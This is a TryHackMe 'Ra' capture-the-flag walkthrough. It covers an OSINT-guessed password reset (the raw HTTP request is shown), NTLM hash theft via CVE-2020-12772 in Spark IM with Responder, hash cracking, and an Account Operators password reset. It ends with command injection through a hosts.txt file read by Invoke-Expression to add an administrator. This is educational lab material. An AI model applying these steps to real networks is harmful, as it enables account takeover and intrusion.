I’m writing this post as I go through the Ra challenge on TryHackMe. I will try to be as detailed as possible as I’m trying to differentiate from other writeups. I want the reader to learn as much as possible.
Port Scanning
Usually for THM, I stick with the top 1000 ports unless I’m not finding much. This is just a time thing. To be thorough, you’d obviously want to check all ports in a pentest. For now I run “sudo nmap -v -sS IP”
Checking The Website
So, I looked at the website.
One thing that we notice from this screenshot is that there’s a password reset link. But when we try to go to it, we get this:
We can resolve this error by adding fire.windcorp.thm to our hosts file or go directly to this link with the IP address. I went ahead and edited my hosts file (/etc/hosts)
From here, we can click the link and get the reset password page:
We don’t really have usernames or answers to these questions yet, but here are a list of the questions:
Looking further at the main page, we see a quick tidbit about 3 employees
One of these employees “Lily Levesque” has a picture with a dog which could be her favorite pet (a security question). I decided to reverse image search on google to see if we could do some OSINT, but got even luckier when I copied the image location and pasted into Google.
While this was luck (sometimes luck is what you need), I would have eventually seen this if I was just going through the sources of the page which is definitely a step I’d take if I’m not getting anywhere and need to figure out what everything is doing. Also, I would have had to save the picture anyways due to it being in a private THM network and Google wouldn’t have been able to retrieve. This was a slip-up as I’m used to public websites :). Anyways, let’s move forward.
Now, at this point I thought we didn’t have her username and tried stuff like llevesque and l.levesque and lily.levesque and then my brain clicked that it was also in the image name “lilyle”. I went ahead and reset the password.
POST /check.asp HTTP/1.1
Host: fire.windcorp.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://fire.windcorp.thm/reset.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Connection: close
Cookie: JSESSIONID=node0n5xkn7uovpg3zgps7rsx4x8l29.node0; ASPSESSIONIDQQSCDTTQ=CCEJCFHDGMGKCHAEKENNEINE
Upgrade-Insecure-Requests: 1
username=lilyle&question=3&secret=SparkyAnd I got the response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Fri, 14 Aug 2020 20:01:09 GMT
Connection: close
Content-Length: 1038
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>Windcorp.</title>
<!-- Bootstrap core CSS -->
<link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom fonts for this template -->
<link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet">
<link href="vendor/simple-line-icons/css/simple-line-icons.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic" rel="stylesheet" type="text/css">
<!-- Custom styles for this template -->
<link href="css/landing-page.min.css" rel="stylesheet">
</head>
<body>
<div class="jumbotron" style="height:100vh;">
<h4 class='display-3'>Your password has been reset to: <b>ChangeMe#1234</b><br></h4>Remember to change it after logging in!
</div>
</body>
</html>
You can see in this response that the password was changed to “ChangeMe#1234”. Yay!
Using The Credentials
Now where do we sign in? Well, we had other ports open on the system. Let’s try using them on SMB. I tried running CrackMapExec but was not able to login, so I just tried enumerating shares using smbmap.
A share called “Shared” was enumerated and we can see the flag and some executables.
I used smbclient to download these files:
When downloading the .deb I kept running into issues with timeout errors.
I fixed this by adding a timeout (-t)
Now, we can install the .deb file
After running Sparking by typing “spark” into the terminal, you see the UI. So now we know it’s Spark Instant Messenger. We can attempt to login with the same creds we have
Previously if you ran into certificate errors, you might want to check the options in Advanced:
Okay, so we’re authenticated.. Now what? Let’s look up what Spark IM is. After Googling “Spark Instant Messenger exploit” you’ll eventually come across CVE-2020-12772.
When searching for an exploit for CVE-2020-12772, you eventually come across a Github page:
Cool, so now we know we can send something to someone, but to who? Well, on the webpage, there were XMPP links. Let’s choose someone.
Since it shows Buse Candan online, I chose to target them.
Okay, so we know that we need to get the NTLM hash from this user by exploiting the vulnerability found. In order to do this, we’ll use Responder. We’ve used Responder before: https://gameofpwnz.com/responder-multirelay-mimikatz-crackmapexec-windows-pwnage/
We set the -I as “tun0” because we are on the VPN. We then send the payload to Buse:
Now we capture his hash in Responder:
Now that we have a hash, we can crack it. Unfortunately this type of hash is not usable for Pass-The-Hash because it’s Net-NTLMv2 and can’t relay because you are unable to relay from a machine to itself: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
We will try to crack with rockyou.txt since it’s THM and pretty much what is expected. We will be using hashcat mode 2600
The mode is important. If you don’t put the right mode it won’t work.
Looks like we cracked it. Now let’s use it. After toying around with ways to use the credentials, I installed Evil-WinRM so I could use WinRM to login
I then found the 2nd flag in the Desktop. We then see a scripts directory in c:\
When opening the files in the scripts directory, we’ll see a ps1 file is run every minute. If you look at the ps1 file, you’ll see this line:
This takes whatever is in that hosts.txt file in Brittany’s folder and uses Invoke-Expression.
We need to get access to that hosts.txt file. Let’s check what permissions we have and what groups we’re in.
This didn’t get us much.
After looking up all the groups, we can see that Account Operators gives us the ability to alter accounts. https://www.secframe.com/blog/account-operators
We then change BrittanyCR’s password using the net user command:
We can then use smbmap to figure out the shares BrittanyCR has access to:
We can then see we can upload to the hosts.txt file:
Our hosts.txt looks like this:
The leading “;” terminates the command in the ps1 script we found earlier and then we use net user to add gameofpwnz and put them in the Administrators group.
We can verify the GameOfPWNZ user is created:
We then use WinRM to login and cat the admin flag:
And that’s it. We completed this box and got our points.